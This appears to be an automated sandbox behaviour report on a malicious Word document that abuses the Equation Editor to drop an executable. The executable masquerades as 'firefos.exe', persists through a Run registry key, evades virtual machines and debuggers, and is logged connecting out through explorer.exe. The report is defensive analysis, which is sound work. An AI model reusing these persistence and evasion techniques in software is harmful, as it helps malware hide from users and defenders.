          Source: C:\Users\user\AppData\Roaming\skypound83892.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: VOMAXTRADING.docStatic file information: File size 1677719 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: firefos.exe
          Source: Binary string: napstat.pdb source: skypound83892.exe, 00000006.00000002.2203275635.0000000000430000.00000040.00000001.sdmp
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041B3B5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041B46C push eax; ret
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041B402 push eax; ret
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041B40B push eax; ret
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013B402 push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013B40B push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013B46C push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041B3B5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041B46C push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041B402 push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041B40B push eax; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094DFA1 push ecx; ret
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008BDFA1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97370301044
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97370301044
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97370301044
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\skypound83892.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FirefoxeJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefosJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefosJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000001285E4 second address: 00000000001285EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 000000000012897E second address: 0000000000128984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1296Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe TID: 2308Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2692Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2820Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe TID: 2960Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe TID: 2252Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2496Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\
          Source: explorer.exe, 00000007.00000000.2137451244.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.2148237978.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.2148310732.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000007.00000000.2148237978.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.2137478311.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02130080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021300EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 198.49.23.141 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 50.117.11.156 80
          Injects a PE file into a foreign processesShow sources
